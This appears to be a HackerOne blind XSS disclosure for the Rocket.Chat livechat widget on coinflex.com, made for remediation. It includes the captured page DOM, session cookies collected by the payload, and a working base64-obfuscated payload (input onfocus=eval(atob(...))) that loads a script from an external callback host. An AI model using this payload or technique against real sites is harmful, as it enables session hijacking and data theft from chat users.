Rocket.Chat: Blind XSS

2021-01-3108:01:56

cyberasset

hackerone.com

cross-site scripting

vulnerable page

user input

html markup

dom

javascript injection

session hijacking

document object model

livechat

coinflex

blind xss

EPSS

0.001

Percentile

34.0%

JSON

Blind XSS

The page located at https://livechat.coinflex.com/livechat suffers from a Cross-site Scripting
(XSS) vulnerability. XSS is a vulnerability which occurs when user input is unsafely
encorporated into the HTML markup inside of a webpage. When not properly escaped an
attacker can inject malicious JavaScript that, once evaluated, can be used to hijack
authenticated sessions and rewrite the vulnerable page’s layout and functionality. The
following report contains information on an XSS payload that has fired on
https://livechat.coinflex.com, it can be used to reproduce and remediate the vulnerability.

XSS Payload Fire Details

Vulnerable Page

https://livechat.coinflex.com/livechat

Referer

https://coinflex.com/

User Agent

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36

Cookies (Non-HTTPOnly)

rc_rid=tjtzHoTga9m4EBM3o; rc_token=0917lb1vvydakojqdvlrm7; rc_room_type=l

Document Object Model (DOM)

&lt;html dir="ltr"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;title&gt;Rocket.Chat.Livechat&lt;/title&gt;&lt;meta
name="viewport" content="width=device-width,initial-scale=1"&gt;&lt;link rel="stylesheet"
type="text/css" href="/livechat/61.chunk.a8a84.css"&gt;&lt;script charset="utf-8"
src="/livechat/61.chunk.6a8fa.js"&gt;&lt;/script&gt;&lt;link rel="stylesheet" type="text/css"
href="/livechat/62.chunk.e3920.css"&gt;&lt;script charset="utf-8"
src="/livechat/62.chunk.39808.js"&gt;&lt;/script&gt;&lt;script charset="utf-8"
src="/livechat/i18n.en.chunk.2a3c0.js"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body data-new-gr-c-s-check-
loaded="14.993.0" data-gr-ext-installed="" data-new-gr-c-s-loaded="14.993.0"&gt;<div><div>&lt;style&gt;
.screen__sskEr {
--color: #9437ff;
}
&lt;/style&gt;<div><div><header><div><div>CoinFLEX Live
Chat</div></div><nav>&lt;button
class="header__action__2wnEh" aria-label="Disable notifications"&gt;&lt;svg
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18" width="20" height="20"&gt;&lt;path
d="M4.619 10.532V6.374c0-2.296 1.962-4.158 4.381-4.158 2.419 0 4.381 1.862 4.381
4.158v4.158l1.643 3.118H2.976l1.643-3.118zm3.047 4.426h2.668c-.195.514-.716.884-
1.334.884s-1.139-.37-1.334-.884zm7.048-8.625C14.714 3.388 12.155 1 9 1 5.845 1 3.286
3.388 3.286 6.333V10.6L1 14.867h5.201C6.465 16.084 7.618 17 9 17s2.535-.916 2.799-
2.133H17L14.714 10.6V6.333z" fill="currentColor"
fill-rule="evenodd"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;&lt;button class="header__action__2wnEh" aria-
label="Minimize chat"&gt;&lt;svg viewBox="0 0 18 18" xmlns="http://www.w3.org/2000/svg"
width="20" height="20"&gt;&lt;path d="M16.071 5L9 12.071 1.929 5" stroke="currentColor"stroke-width="1.5" fill="none"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;&lt;button
class="header__action__2wnEh" aria-label="Expand chat"&gt;&lt;svg viewBox="0 0 20 20"
xmlns="http://www.w3.org/2000/svg" width="20" height="20"&gt;&lt;path d="M15.286
1H2.715c-.947 0-1.714.767-1.714 1.714v12.571A1.714 1.714 0 002.715 17h12.571c.947 0
1.714-.768 1.714-1.715V2.715C17 1.767 16.233 1 15.286 1zm.571 14.286a.572.572 0
01-.571.571H2.715a.572.572 0
01-.571-.571V2.715c0-.315.256-.571.571-.571h12.571c.315
0 .571.256.571.571v12.571zM4.554 13.244a.429.429 0 010-.606l6.97-6.97-.025-.025-
3.213.012a.429.429 0 01-.429-.428V4.87c0-.237.192-.429.429-.429l4.857-.012c.237
0 .429.192.429.428l-.013 4.858a.429.429 0 01-.428.428h-.357a.429.429 0
01-.429-.428l.012-3.213-.025-.026-6.97 6.97a.429.429 0 01-.606 0l-.202-.202z" stroke-
width=".3" fill="currentColor" stroke="currentColor"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;</nav><div></div></header><div>&lt;input type="file"
class="drop__input__2o6so"&gt;&lt;main class="screen__main__DBTEi screen__main--
nopadding__16Bsg"&gt;<div><div><ol></ol></div></div>&lt;/main&gt;<footer><div><div><div>&lt;button type="button"
class="composer__action__2ZuQd"&gt;&lt;svg viewBox="0 0 20 20"
xmlns="http://www.w3.org/2000/svg" width="20" height="20"&gt;&lt;g fill="none" fill-
rule="evenodd"&gt;&lt;circle cx="12" cy="8" r="1" fill="currentColor"&gt;&lt;/circle&gt;&lt;circle cx="8"
cy="8" r="1" fill="currentColor"&gt;&lt;/circle&gt;&lt;circle cx="10" cy="10" r="7" stroke="currentColor"
stroke-width="1.5"&gt;&lt;/circle&gt;&lt;path d="M7.172 12.328a4 4 0 005.656 0"
stroke="currentColor" stroke-width="1.5"&gt;&lt;/path&gt;&lt;/g&gt;&lt;/svg&gt;&lt;/button&gt;</div><div>"&gt;&lt;input onfocus="eval(atob(this.id))"
id="dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHB
zOi8vYXNzZXRjeWJlci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYS
k7" autofocus=""&gt;</div><div>&lt;button type="button"
class="composer__action__2ZuQd"&gt;&lt;svg viewBox="0 0 24 24"
xmlns="http://www.w3.org/2000/svg" width="20" height="20"&gt;&lt;path d="M10.342
13.283l9.56-10.359-13.049 8.264L1 8.778 21.506 1l-7.778 20.506-3.386-8.223z"
fill="currentColor" stroke="currentColor" stroke-width="1.5" fill-rule="evenodd" stroke-
linecap="round" stroke-linejoin="round"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;</div></div></div><div><h3>Powered by <a href="https://rocket.chat" target="_blank">&lt;svg viewBox="0 0
1500 272" xmlns="http://www.w3.org/2000/svg" class="powered-by__logo__2Y08v"
width="60" height="10.88" role="img" aria-label="Rocket.Chat"&gt;&lt;g fill="none" fill-
rule="evenodd"&gt;&lt;path class="text" d="M461.588 132.646c0 15.237-5.687 25.243-16.607
30.016l15.699 59.582c.681 2.734-.681 4.092-3.186 4.092h-23.663c-2.274 0-3.41-1.135-
3.867-3.184l-15.244-57.76h-15.699v57.31c0 2.276-1.362 3.634-3.64 3.634h-23.663c-2.274
0-3.64-1.365-3.64-3.634V48.052c0-2.273 1.366-3.638 3.64-3.638h57.107c21.385 0 32.763
11.372 32.763 32.746v55.49zm-40.043 2.727c5.914 0 9.1-3.184 9.1-9.095V83.525c0-
5.911-3.186-9.092-9.1-9.092h-22.524v60.943l22.524-.004zm58.235-58.217c0-21.375
11.374-32.746 32.763-32.746h25.483c21.385 0 32.763 11.372 32.763 32.746v116.43c0
21.371-11.377 32.743-32.763 32.743h-25.483c-21.389 0-32.763-11.372-32.763-
32.743V77.156zm52.555 119.84c5.914 0 9.1-2.957 9.1-9.095V82.84c0-5.911-3.186-9.095-
9.1-9.095h-13.194c-5.914 0-9.1 3.184-9.1 9.095V187.9c0 6.134 3.186 9.091 9.1
9.091h13.194zm152.425-95.281c0 2.276-1.366 3.638-3.636 3.638h-22.751c-2.505 0-3.64-
1.361-3.64-3.638v-18.19c0-5.911-3.183-9.092-9.097-9.092h-11.832c-6.14 0-9.1 3.181-9.1
9.092v103.7c0 6.138 3.183 9.088 9.1 9.088h11.832c5.914 0 9.097-2.954 9.097-9.088v-
18.198c0-2.276 1.135-3.638 3.64-3.638h22.75c2.282 0 3.637 1.361 3.637 3.638v24.562c0
21.371-11.604 32.743-32.759 32.743h-25.483c-21.385 0-32.99-11.372-32.99-32.743V77.149c0-21.375 11.604-32.746 32.99-32.746h25.483c21.158 0 32.759 11.372
32.759 32.746v24.559zm96 124.618c-2.735 0-4.321-1.135-5.236-3.408l-28.662-67.542-
8.423 16.148v50.253c0 2.958-1.589 4.55-4.548 4.55h-21.843c-2.958 0-4.551-1.592-4.551-
4.55V48.954c0-2.953 1.593-4.549 4.551-4.549h21.843c2.956 0 4.548 1.592 4.548
4.55v70.495l35.037-71.634c1.14-2.273 2.736-3.41 5.237-3.41H802.6c3.413 0 4.778 2.276
3.182 5.456l-38.673 79.364 41.174 91.874c1.593 2.958.227 5.23-3.41
5.23H780.76zM915.67 70.791c0 2.273-.912 3.865-3.64 3.865h-56.88v45.48h43.456c2.281
0 3.64 1.365 3.64 3.865v22.513c0 2.503-1.366 3.869-3.64
3.869H855.15v45.934h56.88c2.735 0 3.64 1.138 3.64 3.638v22.743c0 2.273-.912 3.63-
3.64 3.63h-83.725c-2.05 0-3.416-1.365-3.416-3.63V48.048c0-2.273 1.366-3.638 3.416-
3.638h83.725c2.735 0 3.64 1.365 3.64 3.638V70.79zm105.56-26.381c2.501 0 3.64 1.365
3.64 3.638V70.79c0 2.273-1.139 3.638-3.64 3.638h-26.391v148.27c0 2.5-1.135 3.63-3.636
3.63H967.54c-2.282 0-3.64-1.13-3.64-3.63V74.429h-26.388c-2.282 0-3.64-1.365-3.64-
3.638V48.048c0-2.273 1.366-3.638 3.64-3.638h83.718zm1.38 156.493c0-2.957 1.593-
4.546 4.552-4.546h20.704c2.959 0 4.548 1.589 4.548 4.546v20.917c0 2.96-1.59 4.55-
4.548 4.55h-20.704c-2.96 0-4.552-1.59-4.552-4.55v-20.917zm143.75-99.188c0 2.276-1.37
3.638-3.64 3.638h-22.75c-2.502 0-3.637-1.361-3.637-3.638v-18.19c0-5.911-3.183-9.092-
9.097-9.092h-11.832c-6.144 0-9.1 3.181-9.1 9.092v103.7c0 6.138 3.183 9.088 9.1
9.088h11.832c5.914 0 9.097-2.954 9.097-9.088v-18.198c0-2.276 1.135-3.638 3.636-
3.638h22.751c2.281 0 3.64 1.361 3.64 3.638v24.562c0 21.371-11.604 32.743-32.763
32.743h-25.483c-21.385 0-32.99-11.372-32.99-32.743V77.149c0-21.375 11.604-32.746
32.99-32.746h25.483c21.162 0 32.763 11.372 32.763 32.746v24.559zm82.81-53.667c0-
2.273 1.362-3.638 3.636-3.638h23.432c2.732 0 3.864 1.365 3.864 3.638v174.65c0 2.273-
1.135 3.63-3.864 3.63h-23.432c-2.28 0-3.636-1.365-3.636-3.63v-72.315h-29.123v72.319c0
2.276-1.366 3.634-3.64 3.634h-23.429c-2.735 0-3.87-1.365-3.87-3.634V48.052c0-2.273
1.135-3.638 3.87-3.638h23.43c2.28 0 3.639 1.365 3.639
3.638v72.315h29.123V48.052zm134.66 178.285c-2.047 0-3.182-1.135-3.64-3.184l-6.368-
33.197h-40.5l-6.137 33.197c-.458 2.05-1.593 3.184-3.64 3.184h-24.341c-2.501 0-3.64-
1.365-2.963-3.865l37.77-174.88c.457-2.273 1.82-3.184 3.866-3.184h31.628c2.047 0
3.413.911 3.867 3.184l37.77 174.88c.457 2.5-.455 3.865-3.183 3.865h-24.128zm-30.262-
142.13l-14.56 79.364h29.123l-14.563-79.364zM1496.23 44.41c2.501 0 3.64 1.365 3.64
3.638V70.79c0 2.273-1.139 3.638-3.64 3.638h-26.388v148.27c0 2.5-1.139 3.63-3.64
3.63h-23.663c-2.274 0-3.636-1.13-3.636-3.63V74.429h-26.388c-2.278 0-3.637-1.365-
3.637-3.638V48.048c0-2.273 1.366-3.638 3.637-3.638h83.715z"&gt;&lt;/path&gt;&lt;path
class="rocket" d="M270.5 105.32l.004.006-.002-.003-.002-.003zM92.94 11.47c9.508 5.28
18.496 11.962 26.171 19.388 12.373-2.24 25.13-3.37 38.072-3.37 38.744 0 75.477 10.163
103.42 28.612 14.473 9.559 25.977 20.9 34.189 33.712 9.145 14.276 13.78 29.63 13.78
46.08 0 16.007-4.636 31.365-13.78 45.64-8.211 12.817-19.715 24.156-34.189 33.715-
27.948 18.45-64.678 28.607-103.42 28.607-12.942 0-25.697-1.13-38.072-3.368a126.331
126.331 0 01-26.171 19.388c-50.802 25.443-92.931.599-92.931.599s39.169-33.254
32.799-62.405C15.283 180.106 5.787 158.44 5.787 135.456c0-22.552 9.499-44.217
27.021-62.182C39.177 44.13.022 10.883.009 10.872c.013-.008 42.136-24.844
92.931.598z" fill="#DB2323" fill-rule="nonzero"&gt;&lt;/path&gt;&lt;path d="M62.545 186.04c-17.412-
13.722-27.863-31.281-27.863-50.419 0-43.916 55.032-79.517 122.92-79.517 67.885 0
122.92 35.601 122.92 79.517s-55.032 79.517-122.92 79.517c-16.731 0-32.681-2.163-
47.219-6.079L99.754 219.31c-5.775 5.57-12.544 10.61-19.6 14.582-9.352 4.593-18.588
7.099-27.725 7.863.515-.937.99-1.886 1.5-2.825 10.65-19.618 13.523-37.248 8.618-
52.89z" fill="#fff"&gt;&lt;/path&gt;&lt;path class="rocket" d="M98.656 154.54c-9.98 0-18.071-8.22-
18.071-18.361s8.09-18.361 18.071-18.361c9.98 0 18.071 8.22 18.071 18.361s-8.09
18.361-18.071 18.361zm58.179 0c-9.98 0-18.071-8.22-18.071-18.361s8.09-18.361 18.071-
18.361 18.071 8.22 18.071 18.361-8.09 18.361-18.071 18.361zm58.179 0c-9.98 0-18.071-
8.22-18.071-18.361s8.09-18.361 18.071-18.361c9.98 0 18.071 8.22 18.071 18.361s-8.09
18.361-18.071 18.361z" fill="#DB2323"
fill-rule="nonzero"&gt;&lt;/path&gt;&lt;/g&gt;&lt;/svg&gt;</a></h3></div></footer></div><div></div></div></div>&lt;button type="button" aria-label="C"class="button__3e1dX button--icon__3a2Uu screen__chat-button__2h7Ad"&gt;&lt;svg
xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20"&gt;&lt;path d="M6 6l8.071 8.071m0-
8.071L6 14.071" stroke="currentColor" stroke-width="1.5" stroke-linecap="square"
fill="none"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;<audio src="https://livechat.coinflex.com/sounds/chime.mp3"></audio></div></div>&lt;script&gt; SERVER_URL =
'https://livechat.coinflex.com'; &lt;/script&gt;&lt;script
src="/livechat/0.chunk.85c58.js"&gt;&lt;/script&gt;&lt;script
src="/livechat/polyfills.38c0c.js"&gt;&lt;/script&gt;&lt;script
src="/livechat/vendors~bundle.chunk.b4ad3.js"&gt;&lt;/script&gt;&lt;script
src="/livechat/bundle.e0274.js"&gt;&lt;/script&gt;&lt;script
src="https://assetcyber.xss.ht"&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;

Origin

https://livechat.coinflex.com

Payload for xss

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXNzZXRjeWJlci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>